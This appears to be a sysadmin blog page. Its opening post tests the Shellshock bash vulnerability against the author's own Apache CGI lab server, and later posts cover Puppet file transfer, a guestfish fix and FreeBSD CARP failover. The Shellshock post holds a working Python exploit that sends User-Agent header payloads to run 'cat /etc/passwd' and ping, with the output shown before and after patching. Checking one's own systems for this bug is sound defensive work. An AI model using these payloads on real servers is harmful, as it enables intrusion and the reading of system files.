lost and found ( for me ? )

bash vulnerability ( CVE-2014-6271 and CVE-2014-7169 )

Here are logs when I checked to see if this is fixed in my machine.

client (python script ) --- apache + cgi

[ unpatched versions  ]

# bash --version
bash --version
GNU bash, version 4.3.11(1)-release (x86_64-pc-linux-gnu)

this script tries to execute cat /etc/passwd and ping command.
# cat http_request.py
#!/usr/bin/env python

import requests

url = 'http://192.168.11.8/example2.cgi'

headers1 = {
   'User-Agent':'() { test;};echo "Content-type: text/plain"; echo; echo; /bin/cat /etc/passwd',
}

headers2 = {
   'User-Agent':'() { test;}; echo "Content-type: text/plain"; echo; echo; /bin/ping -c 3 192.168.11.1',
}

r = requests.get(url, headers=headers1)
print r.text

r = requests.get(url, headers=headers2)
print r.text


# ./http_request.py
first request


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin


done!

second request


PING 192.168.11.1 (192.168.11.1) 56(84) bytes of data.
64 bytes from 192.168.11.1: icmp_seq=1 ttl=64 time=13.6 ms
64 bytes from 192.168.11.1: icmp_seq=2 ttl=64 time=1.59 ms
64 bytes from 192.168.11.1: icmp_seq=3 ttl=64 time=6.83 ms

--- 192.168.11.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 1.598/7.363/13.656/4.937 ms

done!


[ patched versions ]

# bash --version
bash --version
GNU bash, version 4.3.11(1)-release (x86_64-pc-linux-gnu)


# ./http_request.py
first request


Hi

done!

second request


Hi

done!


[ apache cgi configuration ]

# tail -1 /etc/lsb-release  
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"


/etc/apache2/sites-available/000-default.conf

             <Directory /var/www/html/>
               Options Indexes FollowSymLinks MultiViews ExecCGI
               AllowOverride None
               Order allow,deny
               allow from all
           </Directory>


/etc/apache2/mods-enabled/mime.conf
   AddHandler cgi-script .cgi .py .pl .rb


# a2enmod cgi

# /etc/init.d/apache2 restart

# cat /var/www/html/example2.cgi
#!/bin/bash
echo "Content-type: text/plain"
echo
echo
echo "Hi"

# chmod 705 /var/www/html/example2.cgi

Ubuntu 14.04 puppet : transfer files from puppet master to agent

Here is how to transfer files from puppet master to agent.

Reference
http://manuel.kiessling.net/2014/03/26/building-manageable-server-infrastructures-with-puppet-part-2/

There are one master and one agent in my environment.

192.168.11.12 puppet-master
192.168.11.13 puppet-agent01

puppet-master
# dpkg -l | grep puppet
ii  puppet-common                       3.4.3-1                       all          Centralized configuration management
ii  puppetmaster                        3.4.3-1                       all          Centralized configuration management - master startup and compatibility scripts
ii  puppetmaster-common                 3.4.3-1                       all          Puppet master common scripts

agent
# dpkg -l puppet
ii  puppet         3.4.3-1      all          Centralized configuration managem

Assumes that you have installed the master and the agent.

on the master
/etc/puppet/files is a directory to transfer files to agents.
# ls /etc/puppet/files
root@puppet-master:~#

You can define this directory in /etc/puppet/fileserver.conf
on the master
root@puppet-master:~# grep -v ^# /etc/puppet/fileserver.conf

[files]
 path /etc/puppet/files
 allow *

[plugins]

I added “allow *” in the [files] section to allow agents to get files
restart the master
root@puppet-master:~# /etc/init.d/puppetmaster restart
* Restarting puppet master                                              [ OK ]

create a file on the master
root@puppet-master:~# echo "hello world" > /etc/puppet/files/helloworld.txt
root@puppet-master:~#
root@puppet-master:~# cat /etc/puppet/files/helloworld.txt
hello world

here is a manifest file.
on the master
root@puppet-master:~# cat /etc/puppet/manifests/site.pp
node "puppet-agent01" {
   file {"/root/helloworld.txt":
       ensure => file,
       owner => "root",
       group => "root",
       mode => 0644,
       source => "puppet://puppet-master/files/helloworld.txt"
   }
}

on the agent
the agent got the file from the master.
root@puppet-agent01:~# puppet agent --verbose --no-daemonize --onetime
Info: Retrieving plugin
Info: Caching catalog for puppet-agent01.tcv.jp
Info: Applying configuration version '1410190960'
Notice: /Stage[main]/Main/Node[puppet-agent01]/File[/root/helloworld.txt]/ensure: defined content as '{md5}6f5902ac237024bdd0c176cb93063dc4'
Notice: Finished catalog run in 0.22 seconds
root@puppet-agent01:~#



root@puppet-agent01:~# cat /root/helloworld.txt
hello world

the agent connected to the master over TCP dst 8140
root@puppet-master:~# tshark -n -r a.pcap -Y '(tcp.port == 8140)'
Running as user "root" and group "root". This could be dangerous.
 1 0.000000000 192.168.11.13 -> 192.168.11.12 TCP 74 52861 > 8140 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=1652154 TSecr=0 WS=128
 2 0.000039000 192.168.11.12 -> 192.168.11.13 TCP 74 8140 > 52861 [SYN, ACK] Seq=0 Ack=1 Win=28960 Len=0 MSS=1460 SACK_PERM=1 TSval=1653573 TSecr=1652154 WS=128
 3 0.000433000 192.168.11.13 -> 192.168.11.12 TCP 66 52861 > 8140 [ACK] Seq=1 Ack=1 Win=29312 Len=0 TSval=1652154 TSecr=1653573

Ubuntu 14.04 : guestfish error /usr/bin/supermin-helper exited with error status 1.

If you see following errors when you try to mount KVM images over guestfs, you would solve this by issuing “update-guestfs-appliance” command.

-- error
libguestfs: error: /usr/bin/supermin-helper exited with error status 1.
--

install guestfish
# apt-get install libguestfs-tools

# dpkg -l | grep guestfs-tools
ii  libguestfs-tools                                      1:1.24.5-1                                          amd64        guest disk image management system - tools

# guestfish

Welcome to guestfish, the guest filesystem shell for
editing virtual machine filesystems and disk images.

Type: 'help' for help on commands
     'man' to read the manual
     'quit' to quit the shell

><fs> add-ro /var/lib/libvirt/images/freebsd-vm1.img
><fs> run
libguestfs: error: /usr/bin/supermin-helper exited with error status 1.
To see full error messages you may need to enable debugging.
See http://libguestfs.org/guestfs-faq.1.html#debugging-libguestfs
><fs> list-filesystems
libguestfs: error: list_devices: call launch before using this function
(in guestfish, don't forget to use the 'run' command)
><fs> quit

# update-guestfs-appliance

# guestfish

Welcome to guestfish, the guest filesystem shell for
editing virtual machine filesystems and disk images.

Type: 'help' for help on commands
     'man' to read the manual
     'quit' to quit the shell

><fs>  add-ro /var/lib/libvirt/images/freebsd-vm1.img
><fs> list-devices
libguestfs: error: list_devices: call launch before using this function
(in guestfish, don't forget to use the 'run' command)
><fs> run
100% ?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa? 00:00
><fs> list-devices
/dev/sda
><fs> list-filesystems
/dev/sda1: unknown
/dev/sda2: ufs
/dev/sda3: unknown
><fs> quit

FreeBSD 9.3 : how to configure carp

Here is how to configure carp on FreeBSD 9.3.

Reference

Two FreeBSD 9.3 machines are running as virtual machines and these VMs have two vNICs.

SW-  em0 VM1 em1 -------|
| ---   em0 VM2 em1  ---- SW

edit /boot/loader.conf so that the OS loads carp module when booting.
root@bsd93-vm1:~ # cat /boot/loader.conf
if_carp_load="YES"

reboot the OS

make sure the OS is loading carp module.
root@bsd93-vm1:~ # kldstat
Id Refs Address            Size     Name
1    3 0xffffffff80200000 1611638  kernel
2    1 0xffffffff81812000 10db0    if_carp.ko

on the VM1
add carp0 device to em1
root@bsd93-vm1:~ # cat /etc/rc.conf
hostname="bsd93-vm1"
keymap="jp.106x.kbd"
ifconfig_em0="DHCP"
sshd_enable="YES"
# Set dumpdev to "AUTO" to enable crash dumps, "NO" to disable
dumpdev="AUTO"
unbound_enable="YES"

ifconfig_em1="inet 192.168.1.3 netmask 255.255.255.0"
cloned_interfaces="carp0"
ifconfig_carp0="vhid 1 pass testpass 192.168.1.50/24"

on the VM2
root@bsd93-vm2:~ # cat /etc/rc.conf
hostname="bsd93-vm2"
keymap="jp.106x.kbd"
ifconfig_em0="DHCP"
sshd_enable="YES"
# Set dumpdev to "AUTO" to enable crash dumps, "NO" to disable
dumpdev="AUTO"
unbound_enable="YES"

ifconfig_em1="inet 192.168.1.4 netmask 255.255.255.0"
cloned_interfaces="carp0"
ifconfig_carp0="vhid 1 advskew 100 pass testpass 192.168.1.50/24"

reboot VM1 and VM2.

Both VM has same IP 192.168.1.50 on carp0 device.
Backup box also grabs the VIP when that machine is in backup state.

VM1 is master.
root@bsd93-vm1:~ # ifconfig -a
em0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500
options=209b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM,WOL_MAGIC>
ether 52:54:00:16:a6:9e
inet 192.168.11.20 netmask 0xffffff00 broadcast 192.168.11.255
nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>
media: Ethernet autoselect (1000baseT <full-duplex>)
status: active
em1: flags=8943<UP,BROADCAST,RUNNING,PROMISC,SIMPLEX,MULTICAST> metric 0 mtu 1500
options=209b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM,WOL_MAGIC>
ether 52:54:00:2c:8b:7b
inet 192.168.1.3 netmask 0xffffff00 broadcast 192.168.1.255
inet6 fe80::5054:ff:fe2c:8b7b%em1 prefixlen 64 scopeid 0x3
nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>
media: Ethernet autoselect (1000baseT <full-duplex>)
status: active
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> metric 0 mtu 16384
options=600003<RXCSUM,TXCSUM,RXCSUM_IPV6,TXCSUM_IPV6>
inet6 ::1 prefixlen 128
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x4
inet 127.0.0.1 netmask 0xff000000
nd6 options=21<PERFORMNUD,AUTO_LINKLOCAL>
carp0: flags=49<UP,LOOPBACK,RUNNING> metric 0 mtu 1500
inet 192.168.1.50 netmask 0xffffff00
nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>
carp: MASTER vhid 1 advbase 1 advskew 0
root@bsd93-vm1:~ #

on the VM2
VM2 is backup.
root@bsd93-vm2:~ # ifconfig -a
em0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500
options=209b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM,WOL_MAGIC>
ether 52:54:00:de:6d:92
inet 192.168.11.17 netmask 0xffffff00 broadcast 192.168.11.255
nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>
media: Ethernet autoselect (1000baseT <full-duplex>)
status: active
em1: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500
options=209b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM,WOL_MAGIC>
ether 52:54:00:e1:ea:69
inet 192.168.1.4 netmask 0xffffff00 broadcast 192.168.1.255
inet6 fe80::5054:ff:fee1:ea69%em1 prefixlen 64 scopeid 0x3
nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>
media: Ethernet autoselect (1000baseT <full-duplex>)
status: active
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> metric 0 mtu 16384
options=600003<RXCSUM,TXCSUM,RXCSUM_IPV6,TXCSUM_IPV6>
inet6 ::1 prefixlen 128
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x4
inet 127.0.0.1 netmask 0xff000000
nd6 options=21<PERFORMNUD,AUTO_LINKLOCAL>
carp0: flags=49<UP,LOOPBACK,RUNNING> metric 0 mtu 1500
inet 192.168.1.50 netmask 0xffffff00
nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>
carp: BACKUP vhid 1 advbase 1 advskew 100

VM1 ( 192.168.1.3 ) is sending advertisement packets every second.
root@bsd93-vm2:~ # tcpdump -i em1 -n carp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on em1, link-type EN10MB (Ethernet), capture size 65535 bytes
17:23:10.707902 IP 192.168.1.3 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 0, authtype none, intvl 1s, length 36
17:23:11.717968 IP 192.168.1.3 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 0, authtype none, intvl 1s, length 36

reboot the VM1.

VM2 is master
root@bsd93-vm2:~ # ifconfig carp0
carp0: flags=49<UP,LOOPBACK,RUNNING> metric 0 mtu 1500
inet 192.168.1.50 netmask 0xffffff00
nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>
carp: MASTER vhid 1 advbase 1 advskew 100

VM1 is backup.
root@bsd93-vm1:~ # ifconfig carp0
carp0: flags=49<UP,LOOPBACK,RUNNING> metric 0 mtu 1500
inet 192.168.1.50 netmask 0xffffff00
nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>
carp: BACKUP vhid 1 advbase 1 advskew 0


[ make high availability of DNS “unbound” with CARP ]

With CARP, backup machine can grab VIPs when that machine is in backup state, so you do not need to restart unbound process when master-backup state has changed.

VM1
unbound.conf
       interface: 192.168.1.50
       interface: 127.0.0.1

VM2
unbound.conf
       interface: 192.168.1.50
       interface: 127.0.0.1

When VM2 is master
root@bsd93-vm2:~ # ifconfig carp0
carp0: flags=49<UP,LOOPBACK,RUNNING> metric 0 mtu 1500
inet 192.168.1.50 netmask 0xffffff00
nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>
carp: MASTER vhid 1 advbase 1 advskew 100


# /var/log/messages
Sep  7 17:57:56 bsd93-vm2 unbound: [858:0] info: 192.168.1.100 www.google.com. A IN

When VM1 is master
root@bsd93-vm1:~ # ifconfig carp0
carp0: flags=49<UP,LOOPBACK,RUNNING> metric 0 mtu 1500
inet 192.168.1.50 netmask 0xffffff00
nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>
carp: MASTER vhid 1 advbase 1 advskew 0


# /var/log/messages
Sep  7 17:58:45 bsd93-vm1 kernel: carp0: link state changed to UP
Sep  7 17:59:25 bsd93-vm1 unbound: [853:0] info: 192.168.1.100 www.google.com. A IN